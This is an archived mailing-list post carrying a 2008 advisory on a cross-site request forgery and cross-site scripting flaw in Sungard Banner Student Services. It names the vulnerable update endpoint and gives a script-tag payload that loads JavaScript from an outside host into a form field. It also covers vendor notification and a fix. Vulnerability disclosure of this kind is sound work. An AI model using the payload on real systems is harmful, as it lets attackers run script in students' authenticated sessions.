Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

CSRF/XSS in Sungard Banner

from [banner] Network Security [Permanent Link]
Subject: CSRF/XSS in Sungard Banner
Date: Tue, 29 Jan 2008 08:43:59 -0800 (PST) 
http://ch4n.org/banner.txt

Application:            Banner -- Student Services
Version:                7.3
Bug:                    Cross-site Request Forgery, cross site scripting
Exploitation:           Remote, versus authenticated users
Discovery Date:         August 21, 2007
Notification Date:      August 22, 2007
Disclosure Date:        January 29, 2008

Author:         Brendan M. Hickey
Website:        http://www.bhickey.net
                http://www.ch4n.org

INTRODUCTION

"Banner is the world's most widely used collegiate administrative suite of
student, financial aid, finance, human resources, and advancement systems."
 -- Sungard.com

"Banner Student fuses administrative and academic functions that make it
easy to manage data while giving prospects, learners (both traditional and
non-traditional), and faculty secure, 24x7, online access to the
information they need. Prospects can apply for admissions. Learners can
search and register for classes by term or date, and retrieve financial
aid data. Faculty can easily manage course information, rosters, and
grading, and advise students."

-- Banner Student product information
(http://www.sungardhe.com/Products/Product.aspx?id=1024)

University students interact with 'Banner Student Services' through a web
interface. Tasks are performed by making POST requests to fixed URLs.
A cross-site script attack facilitated by cross-site request forgery was
discovered in the "Emergency Contacts" section of the service.

BUG

A student may update her emergency contacts through a web form. Each form
field is checked for length, the longest accepting 30 characters, but not
content.
An attacker can inject arbitrary javascript code into an user's session by
luring authenticated Banner users to a website that makes a POST request
to the update contacts script.

The script necessary to update the emergency contacts is located at:
        http://BANNERDOMAIN/ss/bwgkoemr.P_UpdateEmrgContacts

Setting the address field (add1) to

<script src=http://ch4n.org/s>

is necessary to include malicious javascript. Other form variables must be
set, this can be seen in the example code.

EXAMPLE CODE

http://ch4n.org/banner_code.txt

VENDOR NOTIFICATION

The vulnerability was disclosed to Sungard on August 22, 2007.

FIX

This vulnerability can be remedied by requiring a magic number to
accompany POST requests.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • CSRF/XSS in Sungard Banner, banner <=
Previous by Date:  Re: C4 Security Advisory - GE Fanuc Proficy Information Portal 2.6 Authentication Vulnerability, pete . sage
Next by Date:  Nucleus 3.31 XSS in path, Digital Security Research Group
Previous by Thread:  [Full-disclosure] Advisory: Tripwire Enterprise/Server XSS Vulnerability, Liquidmatrix Security Digest
Next by Thread:  Nucleus 3.31 XSS in path, Digital Security Research Group
Indexes:  [Date] [Thread] [Top] [All Lists]